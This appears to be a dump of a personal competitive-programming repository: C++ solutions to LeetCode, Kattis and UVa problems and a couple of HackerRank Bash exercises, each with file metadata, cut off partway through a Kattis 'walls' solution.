"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nconst int NMAX = 1e6 + 3;\r\nint n, m, sum[NMAX], a[NMAX], blockSize;\r\n\r\n//----------------------------------------\r\nvoid update(int i) {\r\n sum[i / blockSize] += (a[i] ^ 1) - a[i];\r\n a[i] ^= 1;\r\n}\r\n//----------------------------------------\r\nint getResult(int l, int r) {\r\n int res = 0;\r\n while (l <= r and l % blockSize != 0) {\r\n res += a[l];\r\n l += 1;\r\n }\r\n while (l + blockSize - 1 <= r) {\r\n res += sum[l / blockSize];\r\n l += blockSize;\r\n }\r\n\r\n while (l <= r) {\r\n res += a[l];\r\n l += 1;\r\n }\r\n\r\n return res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n string ch; int u, v;\r\n cin >> n >> m;\r\n blockSize = sqrt(n);\r\n while (m--) {\r\n cin >> ch;\r\n if (ch == \"F\") {\r\n cin >> u;\r\n update(u - 1);\r\n }\r\n else {\r\n cin >> u >> v;\r\n cout << getResult(u - 1, v - 1) << endl;\r\n }\r\n }\r\n}"
},
{
"alpha_fraction": 0.5152091383934021,
"alphanum_fraction": 0.5209125280380249,
"avg_line_length": 19.91666603088379,
"blob_id": "6113f530607a88e9d1dae67d973885bb790630fd",
"content_id": "8908653b24e044eca9de5f15984630531e4829ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 526,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 24,
"path": "/leetcode/longestSubstring.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nclass Solution {\r\n\tpublic:\r\n\t\tint lengthOfLongestSubstring(string s) {\r\n\t\t\tmap<char, int> m;\r\n\t\t\tint res = 0;\r\n\t\t\tint pPosition = -1;\r\n\t\t\tfor (int i = 0; i < s.length(); i++) {\r\n\t\t\t\tif (m.find(s[i]) != m.end())\r\n\t\t\t\t\tpPosition = max(pPosition, m[s[i]]);\r\n\t\t\t\tm[s[i]] = i;\r\n\t\t\t\t//cout << i << \" \" << pPosition << endl;\r\n\t\t\t\tres = max(res, i - pPosition);\r\n\t\t\t}\t\r\n\t\t\treturn res;\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n\tSolution a = Solution();\r\n\tcout << a.lengthOfLongestSubstring(\" \");\r\n}\r\n"
},
{
"alpha_fraction": 0.37265416979789734,
"alphanum_fraction": 0.39946380257606506,
"avg_line_length": 20.058822631835938,
"blob_id": "c9848e56ec185c83820bd47cf2cd4bd68bcb3d09",
"content_id": "4cf455c8f709a203c0c406b4cdb213c5ad04ee5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 373,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 17,
"path": "/katis/backspace.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nchar a[1000005];\r\n//----------------------------------------\r\nint main() {\r\n char ch;\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int current = -1;\r\n while (cin >> ch) {\r\n if (ch != '<') a[++current] = ch;\r\n else current -= 1;\r\n }\r\n\r\n for (auto i = 0; i <= current; i++)\r\n cout << a[i];\r\n}"
},
{
"alpha_fraction": 0.5319148898124695,
"alphanum_fraction": 0.5460993051528931,
"avg_line_length": 10.75,
"blob_id": "a76395f49f87b85c93e8b76c78ac6bdc5bc69806",
"content_id": "03a3374d5b61c9fb3f8a41d450539e21456abefd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 141,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 12,
"path": "/leetcode/reverse_integer.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n\nint main() {\n\ttry {\n\t\tint a = 4 / 0;\n\t} \n\tcatch (exception& e) {\n\t\tcout << \"Exception\";\n\t}\n}\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 12,
"blob_id": "e857c9409479e9d213aff8c343908ec10ba2339e",
"content_id": "d83af1cb835714577a69a8488add2cf7ecd0b4c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 3,
"path": "/Cargo.toml",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "[package]\nversion = \"2019\"\nname = \"cp\"\n\n"
},
{
"alpha_fraction": 0.5333333611488342,
"alphanum_fraction": 0.5333333611488342,
"avg_line_length": 19.714284896850586,
"blob_id": "8f46f0da79ba9285e870193e9a43b8c361a28780",
"content_id": "fd4ed6d6ef3d82399923eacc65192d82d550f810",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 7,
"path": "/katis/hello.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define fori(i, a, b, c) for (int i=a; i <= b; i += c)\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nint main() {\r\n cout << \"Hello World!\";\r\n}"
},
{
"alpha_fraction": 0.4708404839038849,
"alphanum_fraction": 0.4742709994316101,
"avg_line_length": 28.162500381469727,
"blob_id": "99bcc633257629d19711d5010fb2f492fe587704",
"content_id": "75c834fbd2fb969deb970560959e95231bb020dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2332,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 80,
"path": "/uva/123.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nstruct kwic_title {\n int row_num, pos_num;\n kwic_title(int row_num, int pos_num) {\n this -> row_num = row_num;\n this -> pos_num = pos_num;\n }\n};\nvector<string> titles[203];\nvector<string> ignore_words;\nint num_of_titles = -1;\nvector<kwic_title> list_title;\n\nvoid openf() {\n freopen(\"test.inp\", \"r\", stdin);\n freopen(\"test.out\", \"w\", stdout);\n\n bool isTitle = false;\n string s;\n while (getline(cin, s)) {\n if (s == \"::\") {\n isTitle = true;\n continue;\n }\n if (!isTitle) \n ignore_words.push_back(s);\n else {\n num_of_titles++; \n istringstream iss(s);\n string word;\n int pos_of_word = -1;\n while (iss >> word) {\n transform(word.begin(), word.end(), word.begin(), \n [](char c) { return tolower(c);});\n titles[num_of_titles].push_back(word);\n pos_of_word += 1;\n if (find(ignore_words.begin(), ignore_words.end(), word) == ignore_words.end()) {\n list_title.push_back(kwic_title(num_of_titles, pos_of_word));\n }\n }\n }\n }\n}\n\nvoid process() {\n sort(list_title.begin(), list_title.end(), \n [](kwic_title a, kwic_title b) {\n if (titles[a.row_num][a.pos_num] != titles[b.row_num][b.pos_num])\n return titles[a.row_num][a.pos_num] < titles[b.row_num][b.pos_num];\n return ((a.row_num < b.row_num) || (a.row_num == b.row_num && a.pos_num < b.pos_num));\n });\n\n for (auto title: list_title) {\n int row_num = title.row_num, pos_num = title.pos_num;\n vector<string> vs = titles[row_num];\n for (int i = 0; i < vs.size(); i++) {\n if (i != pos_num)\n cout << vs[i];\n else {\n transform(vs[i].begin(), vs[i].end(), vs[i].begin(),\n [](char ch) { return toupper(ch); });\n cout << vs[i];\n }\n if (i < vs.size() - 1) cout << \" \";\n }\n cout << endl;\n }\n}\n\nint main() {\n openf();\n process();\n}"
},
{
"alpha_fraction": 0.35965630412101746,
"alphanum_fraction": 0.39361703395843506,
"avg_line_length": 27.09195327758789,
"blob_id": "457cacf2da0bb1416fdb4631da5d63a0e6ff10fb",
"content_id": "3dda9cbd2124712aea24c5bc1788b8573e741291",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2444,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 87,
"path": "/leetcode/median_of_two_sorted_array.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\n#include <cmath>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\n\nclass Solution {\n public:\n double findMedianSortedArrays(vector<int>& nums1, vector<int>& nums2) {\n int m = nums1.size(), n = nums2.size();\n \n int t1 = trunc(ceil((m + n) / 2.0)) - 1;\n int t2 = trunc(ceil((m + n + 1) / 2.0)) - 1;\n int u1 = findSpecificPosition(nums1, nums2, t1);\n int v1 = findSpecificPosition(nums1, nums2, t2);\n cout << t1 << \" \" << u1 << endl;\n cout << t2 << \" \" << v1 << endl;\n return (u1 + v1) / 2.0;\n }\n\n private:\n int findSpecificPosition(vector<int>& nums1, vector<int>& nums2, int t) {\n // Force nums1.size() must smaller than nums2.size()\n if (nums1.size() > nums2.size()) \n swap(nums1, nums2);\n\n int i1 = 0, j1 = nums1.size() - 1;\n\n while (i1 <= j1) {\n int mid = (i1 + j1 / 2);\n if (mid > t) {\n j1 = mid;\n continue;\n }\n int ind = (t - mid) - 1;\n if (nums1[mid] <= nums2[ind + 1]) {\n if (ind < 0 || nums1[mid] >= nums2[ind])\n return nums1[mid];\n else {\n i1 = mid + 1;\n continue;\n }\n }\n\n if (nums1[mid] >= nums2[ind + 1]) {\n if (mid <= 0 || nums2[ind + 1] >= nums1[mid - 1])\n return nums2[ind + 1];\n else{\n j1 = mid - 1;\n continue;\n }\n }\n }\n return nums2[t];\n }\n\n};\n\nint main() {\n freopen(\"test.inp\", \"r\", stdin);\n vector<int> nums1;\n vector<int> nums2;\n int m, n, u;\n\n cin >> m >> n;\n rep(i, 0, m, 1) {\n cin >> u;\n nums1.push_back(u);\n }\n rep(i, 0, n, 1) {\n cin >> u;\n nums2.push_back(u);\n }\n \n for (auto x : nums1)\n cout << x << \" \";\n cout << endl;\n for (auto x: nums2) \n cout << x << \" \";\n cout << endl;\n Solution a = Solution();\n cout << a.findMedianSortedArrays(nums1, nums2);\n}\n"
},
{
"alpha_fraction": 0.3974591791629791,
"alphanum_fraction": 0.4110707938671112,
"avg_line_length": 25.90243911743164,
"blob_id": "31215ac795d40e487a14f0c202323e5f3acd99dd",
"content_id": "20b2503c81695b58939268fe065b2b4f3f6d3ea9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1102,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 41,
"path": "/leetcode/search_in_sorted_array.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n\nclass Solution {\npublic:\n int search(vector<int>& nums, int target) {\n int l = 0, r = nums.size() - 1, index = 0;\n while (l <= r) {\n int mid = (l + r) / 2;\n if (mid > 0 && nums[mid] < nums[mid - 1]) {\n index = mid;\n break;\n }\n else if (nums[mid] > nums[r])\n l = mid + 1;\n else \n r = mid - 1;\n }\n cout << \"index \" << index << endl;\n\n if (index > 0 && nums[index - 1] >= target) {\n auto it = lower_bound(nums.begin(), nums.begin() + index, target);\n if (*it == target) \n return (it - nums.begin());\n }\n if (nums[nums.size() - 1] >= target) {\n auto it = lower_bound(nums.begin() + index, nums.end(), target);\n if (*it == target)\n return (it - nums.begin());\n }\n return -1;\n } \n};\n\nint main() {\n Solution a = Solution();\n vector<int> v = {3, 1};\n auto x = a.search(v, 1);\n cout << x;\n}"
},
{
"alpha_fraction": 0.40925925970077515,
"alphanum_fraction": 0.43703705072402954,
"avg_line_length": 23.590909957885742,
"blob_id": "d6d31dd4635e82011f0f38b622f4988d53bbd290",
"content_id": "d0a72595c74eb34790f31b1652e5dd6e2b33a1b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 540,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 22,
"path": "/leetcode/longest_valid_parentheses.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\n public:\n static const int NMAX = 3e4 + 3;\n vector<int> ds[2 * NMAX];\n int t[2 * NMAX];\n int pos[2 * NMAX];\n int longestValidParentheses(string s) {\n memset(pos, 0, sizeof(pos));\n memset(t, 0, sizeof(t));\n for (auto i = 0; i < 2 * NMAX; i++)\n ds[i].clear();\n\n for (int i = 0; i < s.size(); i++) {\n int g = (i == 0 ? NMAX : t[i - 1]);\n t[i] = g + (s[i] == '(' ? 1 : -1);\n }\n \n }\n};"
},
{
"alpha_fraction": 0.40076014399528503,
"alphanum_fraction": 0.41342905163764954,
"avg_line_length": 21.235294342041016,
"blob_id": "769a022a3a07dd8769aaa45e9ea03348a1ede2f9",
"content_id": "4daa51cc84a7c3515306135e0783b837a0a5e074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2368,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 102,
"path": "/katis/builddeps.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nconst int NMAX = 1e5 + 3;\r\nint n, res = 0, cnt = 0;\r\nvector<int> ds[NMAX];\r\nmap<string, int> mapFile;\r\nmap<int, string> mapInd;\r\nvector<string> listFile;\r\nqueue<int> q;\r\nvector<int> dependance;\r\nbool inQueue[NMAX];\r\nint deg[NMAX];\r\n//----------------------------------------\r\nint getInd(string fileName) {\r\n if (!mapFile[fileName]) {\r\n mapFile[fileName] = ++cnt;\r\n mapInd[cnt] = fileName;\r\n }\r\n\r\n return mapFile[fileName];\r\n}\r\n//----------------------------------------\r\nvoid openf() {\r\n string s;\r\n cin >> n; \r\n cin.ignore();\r\n rep(depen, 1, n) {\r\n getline(cin, s);\r\n string tmp = \"\";\r\n listFile.clear();\r\n for (auto x: s) {\r\n if (x != ' ') tmp += x;\r\n else {\r\n if (tmp != \"\") listFile.push_back(tmp);\r\n tmp = \"\";\r\n }\r\n }\r\n\r\n if (tmp != \" \") listFile.push_back(tmp);\r\n \r\n listFile[0] = listFile[0].substr(0, listFile[0].length() - 1);\r\n\r\n rep(i, 1, listFile.size() - 1) {\r\n ds[getInd(listFile[i])].push_back(getInd(listFile[0]));\r\n deg[getInd(listFile[0])]++;\r\n }\r\n }\r\n}\r\n//----------------------------------------\r\nvoid DFS(int u) {\r\n if (inQueue[u]) return;\r\n inQueue[u] = 1;\r\n for (auto v: ds[u]) DFS(v);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n string s;\r\n cin >> s;\r\n\r\n DFS(getInd(s));\r\n\r\n rep(i, 1, n) if (deg[i] == 0) \r\n q.push(i);\r\n\r\n while (!q.empty()) {\r\n auto u = q.front();\r\n for (auto v: ds[u]) {\r\n deg[v]--;\r\n if (deg[v] == 0) q.push(v);\r\n }\r\n dependance.push_back(u);\r\n q.pop();\r\n }\r\n\r\n for (auto x: dependance) {\r\n if (inQueue[x]) cout << mapInd[x] << endl;\r\n }\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /*\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.32671675086021423,
"alphanum_fraction": 0.33208155632019043,
"avg_line_length": 21.923076629638672,
"blob_id": "c5b3fe1b099441bc8e4a86251d38f294af840e5e",
"content_id": "a7d81da4168418e431a9c6616f52b14b3c94a93a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1864,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 78,
"path": "/katis/almostunionfind.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int NMAX = 1e5 + 3;\r\nint n, m;\r\nset<int> s[NMAX];\r\nint place[NMAX];\r\nll sum[NMAX];\r\n\r\n//----------------------------------------\r\nvoid unionSet(int u, int v) {\r\n int pu = place[u], pv = place[v];\r\n if (pu == pv) return; \r\n\r\n if (s[pu].size() <= s[pv].size()) swap(pu, pv);\r\n\r\n for (auto x: s[pv]) {\r\n place[x] = pu;\r\n sum[pu] += x;\r\n s[pu].insert(x);\r\n }\r\n\r\n s[pv].clear();\r\n sum[pv] = 0;\r\n\r\n //rep(i, 1, n) \r\n //cout << place[i] << \" \";\r\n //cout << endl;\r\n}\r\n//----------------------------------------\r\nvoid getResult(int u) {\r\n int pu = place[u];\r\n cout << s[pu].size() << \" \" << sum[pu] << endl;\r\n}\r\n//----------------------------------------\r\nvoid unionPointToSet(int u, int v) {\r\n int pu = place[u], pv = place[v];\r\n s[pu].erase(u); s[pv].insert(u);\r\n sum[pu] -= u; sum[pv] += u;\r\n place[u] = pv;\r\n //rep(i, 1, n) \r\n //cout << place[i] << \" \";\r\n //cout << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int t, u, v;\r\n while (cin >> n >> m) {\r\n rep(i, 1, n) {\r\n place[i] = i;\r\n sum[i] = i;\r\n s[i].clear(); \r\n s[i].insert(i);\r\n }\r\n\r\n rep(i, 1, m) {\r\n cin >> t;\r\n //cout << i << endl;\r\n if (t == 1) {\r\n cin >> u >> v;\r\n unionSet(u, v);\r\n }\r\n else if (t == 2) {\r\n cin >> u >> v;\r\n unionPointToSet(u, v);\r\n } \r\n else {\r\n cin >> u;\r\n getResult(u);\r\n }\r\n }\r\n }\r\n}"
},
{
"alpha_fraction": 0.4866270422935486,
"alphanum_fraction": 0.4985141158103943,
"avg_line_length": 25.510204315185547,
"blob_id": "56a2bbecd0f005a54495a4f25110af23a8a40d64",
"content_id": "7e63a3866cdc7dc87a7fb9af47763f343d78b1ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1346,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 49,
"path": "/katis/secretmessage.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define fori(i, a, b, t) for (int i = a; i <= b; i += t)\r\n#define forr(i, a, b, t) for (int i = a; i >= b; i += t)\r\n\r\nconst int NMAX = 107;\r\n\r\nchar a[NMAX][NMAX];\r\nstring originalMessage;\r\n\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> originalMessage; \r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n // find padded message length\r\n int messageLength = originalMessage.length();\r\n int paddedSqare = round(sqrt(messageLength));\r\n if (paddedSqare * paddedSqare < messageLength)\r\n paddedSqare += 1;\r\n int paddedMessageLength = paddedSqare * paddedSqare;\r\n\r\n // push padded message into table\r\n fori(i, 1, paddedMessageLength - messageLength, 1) \r\n originalMessage += '*';\r\n \r\n int currentPosition = 0;\r\n fori(i, 1, paddedSqare, 1)\r\n fori(j, 1, paddedSqare, 1) \r\n a[i][j] = originalMessage[currentPosition++];\r\n\r\n //write encrypted message\r\n fori(j, 1, paddedSqare, 1)\r\n forr(i, paddedSqare, 1, -1) \r\n if (a[i][j] != '*') cout << a[i][j];\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int testCase;\r\n cin >> testCase;\r\n while (testCase--) {\r\n openf();\r\n process();\r\n if (testCase > 0)\r\n cout << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.368905246257782,
"alphanum_fraction": 0.3744250237941742,
"avg_line_length": 20.64583396911621,
"blob_id": "52c9b4c80a6f9b711f003104ae0e61dd60d612bc",
"content_id": "83f127d9bc93aef0b4fb29cfd9f8b74c7b3d89a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1087,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 48,
"path": "/katis/minimumscalar.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nint n; \r\nvector<int> a, b;\r\n//----------------------------------------\r\nvoid process() {\r\n\r\n}\r\n//----------------------------------------\r\nvoid process(int testCase) {\r\n cout << \"Case #\" + to_string(testCase) + \": \";\r\n ll res = 0;\r\n sort(a.begin(), a.end());\r\n sort(b.begin(), b.end(), greater<int>());\r\n\r\n rep(i, 0, a.size() - 1)\r\n res += (ll)a[i] * b[i];\r\n \r\n cout << res << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n int testCase, u;\r\n cin >> testCase;\r\n rep(i, 1, testCase) {\r\n a.clear();\r\n b.clear();\r\n cin >> n;\r\n rep(j, 1, n) {\r\n cin >> u;\r\n a.push_back(u);\r\n }\r\n rep(j, 1, n) {\r\n cin >> u;\r\n b.push_back(u);\r\n }\r\n process(i);\r\n }\r\n}\r\n"
},
{
"alpha_fraction": 0.37803590297698975,
"alphanum_fraction": 0.3885955512523651,
"avg_line_length": 23.648649215698242,
"blob_id": "02aa2a92641d4da196be2fb0cbdb4f95ef00c62b",
"content_id": "befa3360b1ae7185213fdbc84e2ae1710f38c593",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 947,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 37,
"path": "/katis/closestsums.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\nconst int NMAX = 1e3 + 3;\r\n\r\nint n, m, a[NMAX];\r\n//----------------------------------------\r\nstring process(int u) {\r\n int re = 2e9;\r\n rep(i, 1, n)\r\n rep(j, i + 1, n) \r\n if (abs(a[i] + a[j] - u) < abs(re - u)) re = a[i] + a[j];\r\n\r\n return to_string(re);\r\n}\r\n//----------------------------------------\r\nint main() {\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n freopen(\"test.inp\", \"r\", stdin);\r\n\r\n int testCase = 0, u;\r\n while (cin >> n) {\r\n testCase += 1;\r\n cout << \"Case \" + to_string(testCase) + \":\" << endl;\r\n rep(i, 1, n) cin >> a[i];\r\n cin >> m;\r\n while (m--) {\r\n cin >> u;\r\n cout << \"Closet sum to \" + to_string(u) + \" is \" + process(u) + \".\" << endl;\r\n }\r\n }\r\n}"
},
{
"alpha_fraction": 0.40449437499046326,
"alphanum_fraction": 0.47191011905670166,
"avg_line_length": 10,
"blob_id": "896ed4d2f677e327137216169a66f33f3cdd5870",
"content_id": "4a04183a16a274d84fffe6b758eb25fa4fe91198",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 8,
"path": "/bash/hackerrank/loop_skip.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "for i in {1..100}\ndo\n\tif [[ $(( $i % 2 )) -eq 0 ]] \n\tthen \n\t\tcontinue\n\tfi\n\techo $i\ndone\t\n"
},
{
"alpha_fraction": 0.45344826579093933,
"alphanum_fraction": 0.4543103575706482,
"avg_line_length": 23.1875,
"blob_id": "da5bf10fb90a6175443b49e3b6c6ec2ffecda6cc",
"content_id": "13620a98c1e72d33c75384420f4d9b299404a685",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 48,
"path": "/leetcode/23.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(): val(0), next(nullptr) {}\n ListNode(int x): val(x), next(nullptr) {}\n ListNode(int x, ListNode *next): val(x), next(next) {}\n};\n\nclass Solution {\n public:\n ListNode* swapPairs(ListNode* head) {\n if (!head || !head -> next) return head;\n\n ListNode *start = nullptr, *prev = nullptr, *first = nullptr, *second = nullptr;\n\n while (head) {\n if (head -> next) {\n first = head;\n second = head -> next;\n head = head -> next -> next;\n second -> next = first;\n } else {\n second = head;\n first = nullptr;\n head = head -> next;\n }\n\n if (prev)\n prev -> next = second;\n else\n start = second;\n prev = first;\n }\n if (first)\n first -> next = nullptr;\n else\n second -> next = nullptr;\n return start;\n }\n};\n\nint main() {\n Solution a = Solution();\n cout << \"Hello world\";\n}"
},
{
"alpha_fraction": 0.3351498544216156,
"alphanum_fraction": 0.35013625025749207,
"avg_line_length": 18.44444465637207,
"blob_id": "8add40c894fbf1d92f8caa758cd839e0944f20f4",
"content_id": "91ce1354d4637f40f7ae4bf05c102f30c2edb227",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 734,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 36,
"path": "/katis/subseqhard.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define ll long long\r\n\r\nint n;\r\nmap<ll, int> m;\r\n\r\n//----------------------------------------\r\nvoid process() {\r\n int u; ll s = 0, res = 0;\r\n cin.ignore();\r\n m.clear();\r\n m[0] = 1;\r\n cin >> n;\r\n rep(i, 1, n) {\r\n cin >> u;\r\n s += u;\r\n if (m.find(s - 47) != m.end()) \r\n res += m[s - 47];\r\n m[s] = m.find(s) == m.end() ? 1 : m[s] + 1;\r\n }\r\n\r\n cout << res << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int test;\r\n cin >> test;\r\n while (test--) {\r\n cin.ignore();\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.4528301954269409,
"alphanum_fraction": 0.49056604504585266,
"avg_line_length": 12.25,
"blob_id": "fcd6b2c5c2d11e62e4c828696528f581e8a6ff68",
"content_id": "c3e38be62424f5441ab6aa03fa48acd62766da50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 8,
"path": "/bash/hackerrank/paste.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#paste1\npaste -s -d ';'\n#paste2\npaste - - - -d ';'\n#paste3\npaste -s -d $'\\t'\n#paste4\npaste - - - -d $'\\t'\n"
},
{
"alpha_fraction": 0.361328125,
"alphanum_fraction": 0.3932291567325592,
"avg_line_length": 24.517240524291992,
"blob_id": "029cd23c81576e93340a4fdf590bf9dfcfe1e368",
"content_id": "d27adb04b44b4c761772d676db00e0197a466095",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1536,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 58,
"path": "/katis/walls.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\ntypedef pair<float, float> point;\r\nfloat l, w, r;\r\nint n, cover[33];\r\npoint walls[4];\r\nset<int> s;\r\n//----------------------------------------\r\nvoid openf() {\r\n float px, py;\r\n cin >> l >> w >> n >> r;\r\n walls[0] = point(-l/2, 0);\r\n walls[1] = point(l/2, 0);\r\n walls[2] = point(0, -w/2);\r\n walls[3] = point(0, w/2);\r\n\r\n rep(i, 0, n - 1) {\r\n cin >> px >> py;\r\n cover[i] = 0;\r\n rep(j, 0, 3) {\r\n //cout << (pow(px - walls[j].first, 2) + pow(py - walls[j].second, 2)) << endl;\r\n if (pow(px - walls[j].first, 2) + pow(py - walls[j].second, 2) <= r * r)\r\n cover[i] += (1 << j);\r\n }\r\n \r\n //cout << i << \" \" << cover[i] << endl;\r\n }\r\n\r\n int res = 5;\r\n rep(i1, 0, n - 1)\r\n rep(i2, 0, n - 1)\r\n rep(i3, 0, n - 1)\r\n rep(i4, 0, n - 1) {\r\n s.clear();\r\n s.insert(i1); s.insert(i2); s.insert(i3); s.insert(i4);\r\n if ((cover[i1] | cover[i2] | cover[i3] | cover[i4]) == 15) {\r\n res = min(res, int(s.size()));\r\n }\r\n 